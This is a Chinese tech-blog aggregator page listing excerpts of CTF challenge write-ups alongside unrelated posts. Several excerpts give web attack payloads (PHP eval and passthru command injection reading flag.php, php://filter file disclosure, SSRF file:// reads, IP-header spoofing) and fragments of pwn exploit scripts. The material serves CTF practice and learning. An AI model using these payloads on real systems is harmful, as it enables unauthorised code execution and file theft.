E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTF大本营
【BUU
CTF
N1BOOK】[第二章 web进阶] 通关
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言[第二章web进阶]SSRFTraining[第二章web进阶]XSS闯关[第二章web进阶
hacker-routing
·
2024-02-08 23:55
web
CTF夺旗赛
前端
javascript
开发语言
BUUCTF
CTF
网络安全
命运的灯火 - 第四章
哨兵岭是西部荒野人民军的
大本营
,这里生活着一百多名人民军战士,还有几百名平民。在上一段历史里,南山小竹曾来过这里很多次,只不过那时是骑着狮鹫飞过来的。现在的哨兵岭和他记忆中的差别不大,只是更加残破。南
盲蚁
·
2024-02-08 22:33
[NISA
CTF
2022]easyssrf
它提示我们输入那我们输入file:///flagfile://访问本地文件系统它提醒我们输file:///fl4g它提醒我们输ha1x1ux1u.php看到代码stristr($file,“file”)当我们输入file它会提示我们输了啥意思可以前面加个/也可以通过read读取思路都是前面加/不等于flag绕过file=php://filter/read=convert.base64-encode
Ryongao
·
2024-02-08 21:28
NSSCTF
网络安全
ctf
NSSCTF
【微信小程序】图片自适应屏幕
mode的合法值值说明最低版本scaleToFill缩放模式,不保持纵横比缩放图片,使图片的宽高完全拉伸至填满image元素aspe
ctF
it缩放模式,保持纵横
会写代码的饭桶
·
2024-02-08 20:38
微信小程序
学习日志
实践
微信小程序
模板
前端
微信小程序
图片处理
逗比学
CTF
.day5
BUUBURPCOURSE1比较基础的IP伪造题目,基础题get到新的知识点,通过伪造X-Real-IP字段实现本地访问一、原题无源码打开后,只提示需要本地访问。二、伪造xff一说到伪造IP地址,实现本地访问,第一想到的就是X-Forwarded-For字段但是仍然提示“只能本地访问”,服务器检测的不是xff这个字段。然后只能去问度娘X-Real-IP字段映入眼帘三、伪造X-Real-IP字段这次
名为逗比
·
2024-02-08 18:43
逗比学CTF
信息安全
175_combine-two-tables
sele
ctF
irstName,LastName,City,StatefromPersonleftouterjoinAddressonPerson.PersonId=Address.PersonId;
Twopothead
·
2024-02-08 18:45
Vue3创建项目方式及步骤
creating-a-vue-application2、使用的语句有:npminstall-g@vue/cli======之前已安装vue--version======确保版本在4.5.0以上vuecreate项目的名称选择Manuasele
ctf
eatures
一起来学计算机
·
2024-02-08 17:42
vue3.js
vue.js
javascript
前端框架
CTF
show web(命令执行29-36)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:48
前端
CTFshow
web安全
CTF
show web(php命令执行 37-40)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:17
前端
php
android
CTFshow
web安全
在windows系统搭建LVGL模拟器(codeblock工程)
2.pc_simulator_win_codeblocks工程获取仓库地址:lvgl/lv_port_win_codeblocks:WindowsPCsimulatorproje
ctf
orLVGLembeddedGUILibrary
懂IT的嵌入式工程师
·
2024-02-08 12:48
LVGL
LVGL
文件系统
lv_fs
[BUU
CTF
]-PWN:inndy_echo解析
查看保护查看ida有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦完整exp:frompwnimport*p=process('./echo')p=remote('node5.buuoj.cn',25852)system_plt=0x8048400printf_got=0x804
Clxhzg
·
2024-02-08 12:33
PWN
python
开发语言
安全
网络安全
[BUU
CTF
]-PWN:wust
ctf
2020_easyfast解析
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用doublefree有两种解法解法一(doublefree):完整exp:frompwnimport*context(log_level='debug')p=process('./easyfast')target
Clxhzg
·
2024-02-08 12:33
PWN
python
开发语言
[BUU
CTF
]-PWN:a
ctf
_2019_babystack解析
先看保护再看ida原本我以为会是整数溢出,但是实际上不是。这道题考到了栈迁移,并且还给了我们栈的地址,并且正好是栈顶完整exp:frompwnimport*fromLibcSearcherimport*context(log_level='debug')p=process('./babystack')p=remote('node5.buuoj.cn',29218)leave_ret=0x400a1
Clxhzg
·
2024-02-08 12:32
PWN
网络安全
安全
[BUU
CTF
]-PWN:roar
ctf
_2019_easy_pwn解析
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块
Clxhzg
·
2024-02-08 12:02
PWN
安全
网络安全
[BUU
CTF
]-PWN:[极客大挑战 2019]Not Bad解析
保护ida这里使用mmap函数创造了一个内存映射区域从地址0x123000开始,大小位0x1000权限为可写可执行(可读0x1,可写0x2,可执行0x3)设置为私有映射(MAP_PRIVATE)和匿名映射(MAP_ANONYMOUS)常见的标志的值:MAP_SHARED:1MAP_PRIVATE:2MAP_ANONYMOUS:0x20(32)MAP_FIXED:0x10(16)MAP_LOCKED
Clxhzg
·
2024-02-08 12:01
PWN
前端
安全
网络安全
BUU
CTF
-Real-[struts2]s2-001
漏洞描述struts2漏洞S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。例如,在注册或登录页面中,如果提交失败,则服务器通常默认情况下将返回先前提交的数据。由于服务器用于%{value}对提交的数据执行OGNL表达式解析,因此服务器可以直接发送有效载荷来执行命令。漏洞poc验证经过poc验证,我们发现[st
真的学不了一点。。。
·
2024-02-08 11:37
漏洞复现与研究
java
struts
BUU
CTF
-Real-[Tomcat]CVE-2017-12615
目录漏洞描述一、漏洞编号:CVE-2017-12615二、漏洞复现getflag漏洞描述CVE-2017-12615:远程代码执行漏洞影响范围:ApacheTomcat7.0.0-7.0.79(windows环境)当Tomcat运行在Windows操作系统时,且启用了HTTPPUT请求方法(例如,将readonly初始化参数由默认值设置为false),攻击者将有可能可通过精心构造的攻击请求数据包向
真的学不了一点。。。
·
2024-02-08 11:36
漏洞复现与研究
网络安全
H
CTF
2017-Web-Writeup
boringwebsite先通过扫描得到:http://106.15.53.124:38324/www.zip";echo"flagish
ctf
{whatyouget}";error_reporting
dengzhasong7076
·
2024-02-08 10:46
php
数据库
python
mysql 查询重复数据
方法一:使用GROUPBY和HAVING子句sqlSELE
CTf
ield_name,COUNT(field_name)AScountFROMtable_nameGROUPBYfield_nameHAVINGCOUNT
华如锦
·
2024-02-08 10:13
MySQL
mysql
数据库
java
2024年2月第1周
后面开始一周一记录了本周学习:复现了cor
CTF
2023sysretbug相关的题目做了plaid
CTF
2020mojo这道沙箱逃逸题目复现了春秋杯冬季赛的两道题目,比较简单的题目简单的看了下预取侧信道攻击
XiaozaYa
·
2024-02-08 09:49
日记
日记
2024-2-1
今日学习:1)今天主要就复现了cor
CTF
2023sysruption这道题目,终于搞懂了。sysretbug是如此的美妙,但是对于侧信道攻击哪里还是有点问题,就是成功泄漏的概率比较低。
XiaozaYa
·
2024-02-08 09:48
日记
日记
Chrome 沙箱逃逸 -- Plaid
CTF
2020 mojo
MojodocsIntrotoMojo&Services译文:利用MojoIPC的UAF漏洞实现Chrome浏览器沙箱逃逸原文:CleanlyEscapingtheChromeSandbox参考文章本文主要参考Plaid
CTF
2020
XiaozaYa
·
2024-02-08 09:18
V8
chrome
mojo
沙箱逃逸
kali系统搭建BlueLotus_XSSReceiver-master
1.访问GitHub-trysec/BlueLotus_XSSReceiver:XSS平台
CTF
工具Web安全工具下载BlueLotus_XSSReceiver-master2.我的kali系统已安装apache2
fengtianlei159
·
2024-02-08 07:41
安全
web安全
php
资源分享 | 利用机器学习进行高级MRI分析
A
ctf
low大脑活动流工具箱(BrainActivityFlowToolbox,简称A
ctf
low)。该工具箱有助于将大脑连接与任务诱发活动以及相关的认知和行为功能联系起来。
茗创科技
·
2024-02-08 07:11
数据分析
脑电数据分析
fMRI
核磁
经验分享
fMRI
机器学习
2022-03-16 React基础
第一个React程序函数式组件//引入react核心importRea
ctf
rom'react'//引入react对dom操作的核心,相对于react-native而言的importReactDOMfrom'react-dom
null_7d53
·
2024-02-08 07:24
BUU [A
CTF
新生赛2020]Universe_final_answer
[A
CTF
新生赛2020]Universe_final_answer首先查壳,64bit无壳ida64位打开main()__int64__fastcallmain(inta1,char**a2,char
Eutop1a
·
2024-02-08 06:00
buuctf
reverse
ctf
安全
c语言
【ESP32+Python】MQTT服务使用例子包含温感和继电器应用
1.MQTT服务推荐使用emqx2.ESP32基础库,放在目录下名称为umqttsimple.pyimportusocketassocketimportustructasstru
ctf
romubinasciiimporthexlifyclassMQTTException
淡忘_cx
·
2024-02-08 05:00
ESP32+Python
python
开发语言
小迪渗透&
CTF
夺旗&SRC挖掘(拾叁)
(83-88)演示案例:涉及资源84.PHP弱类型&异或取反&序列化&RCEPHP常考点弱类型绕过对比总结反序列化考点:网鼎杯2020-青龙组-web-AreUserialzpreg_match绕过-
ctf
hub
进击的网安攻城狮
·
2024-02-08 05:43
python
flask
pycharm
83
CTF
夺旗-Python考点SSTI&反序列化&字符串
这里写目录标题
CTF
各大题型简介演示案例:
CTF
夺旗-Python-支付逻辑&JWT&反序列化
CTF
夺旗-Python-Flask&jinja2&SSTl模版注入
CTF
夺旗-Python-格式化字符串漏洞
山兔1
·
2024-02-08 05:11
小迪安全
python
开发语言
ctF
S: Replacing File Indexing with Hardware Memory Translation through Contiguous File Allo...——泛读笔记
FAST2022Paper分布式元数据论文汇总问题持久的字节寻址内存(PM)有望在未来的计算机系统中变得普遍。与磁盘存储相比,PM的速度显着更快,并且对PM的访问受到内存管理单元(MMU)的控制,就像对易失性RAM的访问一样。这些独特的特性将性能瓶颈从I/O转移到了块地址查找的操作上,例如,在写入工作负载中,ext4-DAX中高达45%的开销是由于构建和搜索范围树以将文件偏移转换为持久内存上的地址
妙BOOK言
·
2024-02-08 03:40
论文阅读
论文阅读
文件系统
[FE] jsx没提示类型错误
1.场景复现(1)新建项目
[email protected]
(2)新建index.jsx文件import*asRea
ctf
rom'react
何幻
·
2024-02-08 03:11
源码与tarball软件安装
编译的过程中会产生目标文件(Obje
ctf
ile),这些文件是以“
夏夏LJ
·
2024-02-08 03:39
X
CTF
攻防世界MISC进阶篇题目(1-10)
1Training-Stegano-1这是我能想到的最基础的图片隐写术附件是个bmp图片,下载下来长这样一开始先用stegsolve和binwalk看了看没发现问题,然后用winhex发现有文字,“看看hex-edit提示了什么”试着提交flag{steganoI},不对,看了wp说是直接提交steganoI。。。2Test-flag-please-ignore没有题干,有一个附件,下载下来是个没
青崖牧人
·
2024-02-08 02:30
Begin
CTF
2024 RE 部分复现
8.arc上面一托混淆,左边似乎是三个东西相乘单独取出最左边一托打印,可以得到大数组接下来要解密,原代码非常混乱,我们先整理一下,简单去混淆print(all([[data][a][d]==efora,binenumerate([[int(a)forainbin(sum((ord(b)#include#defineDELTA0x9e3779b9#defineMX(((z>>5^y>3^z1){ro
Pisces50002
·
2024-02-08 01:45
c语言
python
汇编
算法
Houdini NODES
Obje
ctf
lagsDisplay是否显示Selectable是否可选中OtherObje
ctf
lags您可以通过右键单击一个节点并打开flags子菜单来设置这些标志。
zrwjsz
·
2024-02-08 00:15
Houdini
CTF
-PWN-堆-【chunk extend/overlapping-2】(hack.lu
ctf
2015 bookstore)
文章目录hack.lu
ctf
2015bookstore检查IDA源码main函数edit_notedelete_notesubmit.fini_array段劫持(回到main函数的方法)思路格式化字符串是啥呢
Full-LLK
·
2024-02-07 22:45
CTF-PWN-堆
CTF-PWN
CTF
|sqlmap的简单使用
工具BurpSuiteChrome插件ProxySwitchyOmegasqlmap示例:BugKu
CTF
题成绩单初步测试1BurpSuite开启代理,随意输入一个id,BurpSuite导出为文件image.png
小半_7a2b
·
2024-02-07 20:46
C Primer Plus(第六版)15.9 编程练习 第6题
//#include#include#includestru
ctf
ont_style{unsignedintfont_ID:8;unsignedintfont_size:7;unsignedintalignment
apple_50569014
·
2024-02-07 19:34
C
Primer
Plus(第六版)
c语言
开发语言
超级演讲家1班毕业典礼——暨1班践行一周年庆典
其间社群衍生出写作日更、普通话99天践行,个人品牌
大本营
……社群里突破自我,生活中积极践行。而那个叨叨的人,早已链接上龙兄。他的进步和成就,源于努力加
花草姐姐
·
2024-02-07 18:19
CTF
之web安全
web安全CSRF简介CSRF,全名CrossSiteRequestForgery,跨站请求伪造。很容易将它与XSS混淆,对于CSRF,其两个关键点是跨站点的请求与请求的伪造,由于目标站无token或referer防御,导致用户的敏感操作的每一个参数都可以被攻击者获知,攻击者即可以伪造一个完全一样的请求以用户的身份达到恶意目的。CSRF类型按请求类型,可分为GET型和POST型。按攻击方式,可分为
不胜舟-
·
2024-02-07 18:43
xss
mysql
git
php
安全
什么是网站安全? 如何对其加固防止网站被黑客攻击
近些年来,网络安全相关话题已经引起了社会的广泛关注,还记得去年暑期大火的偶像连续剧《亲爱的热爱的》讲述了男主希望为中国拿下
CTF
大赛冠军的梦想之路,
CTF
在网络安全领域中指的是网络安全技术人员之间进行技术比拼的一种比赛形式
websinesafe
·
2024-02-07 16:14
网站安全防护
如何防止网站被攻击
网站被攻击怎么解决
网站安全
如何防止网站被攻击
网站被攻击如何解决
渗透测试服务
网站安全公司
吴昕:学会和自己和解
人们提起她,似乎还是那个在快乐
大本营
默默无闻一
遇见以后
·
2024-02-07 15:21
Android用setRectToRect实现Bitmap基于Matrix矩阵scale缩放Re
ctF
动画,Kotlin(二)
Android用setRectToRect实现Bitmap基于Matrix矩阵scale缩放Re
ctF
动画,Kotlin(二)文章https://zhangphil.blog.csdn.net/article
zhangphil
·
2024-02-07 14:44
kotlin
Android
android
kotlin
useSelector useDispatch
1.form.jsimportRea
ctf
rom'react'import{useSelector,useDispatch}from'react-redux'import{updateTel,updateName
penelope_2bad
·
2024-02-07 14:09
oracle rac 增加实例,ORACLE 11GRAC配置单实例ADG
主库和备库:操作系统:Liunx6.5数据库版本:11.2.0.4创建步骤:一.主库配置1.设置为forcelogging模式SQL>alterdatabaseforcelogging;验证SQL>sele
ctf
orce_loggingfromv
weixin_39630880
·
2024-02-07 14:34
oracle
rac
增加实例
[SWPU
CTF
2021 新生赛]no_wakeup
我们可以看到这是一道反序列化的题目但是有他有个wakeup我们需要绕过不然unserialize()会执行里面sha1不可逆加密算法我们只需要在O:6:“HaHaHa”:2:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}多添加一个属性即可O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s
Ryongao
·
2024-02-07 13:36
NSSCTF
网络安全
ctf
NSSCTF
ctf
show-web11~20-WP
web11根据提示,查询对
ctf
show域名进行dns查询,查看TXT记录阿里云查询链接:阿里云网站运维检测平台获取flag成功web12根据题目提示,我们访问robots.txt,获取到后台地址然后我们访问一下后台
五行缺你94
·
2024-02-07 13:20
各大CTF平台WP
web安全
ctf
新建vue2 typescript类型项目
.初始化npminit-y2.安装vue-clinpminstall-D@vue/cli3.查看安装vue-cli的版本4.创建vue2项目npxvuecreate项目名称选择Manuallysele
ctf
eatures
liangbo7
·
2024-02-07 13:14
typescript
javascript
前端
Postgresql自定义函数—表名作为函数参数
CREATEORREPLACEFUNCTIONsome_f(_tbltext,coltext,OUTresultbool)LANGUAGEplpgsqlAS$func$BEGINEXECUTEformat('SELECT(EXISTS(SELE
CTF
ROM
littlegirll
·
2024-02-07 12:19
postgresql
数据库
【Java-框架-SpringSecurity】单点登录(认证和授权)- 随笔
4.0.0org.springframework.bootspring-boot-starter-parent2.5.9com.exampleSpringDemo0.0.1-SNAPSHOTSpringDemoDemoproje
ctf
orSpringBoot8org.springframework.bootspring-boot
SUNxRUN
·
2024-02-07 11:43
java
spring
security
spring
上一页
5
6
7
8
9
10
11
12
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他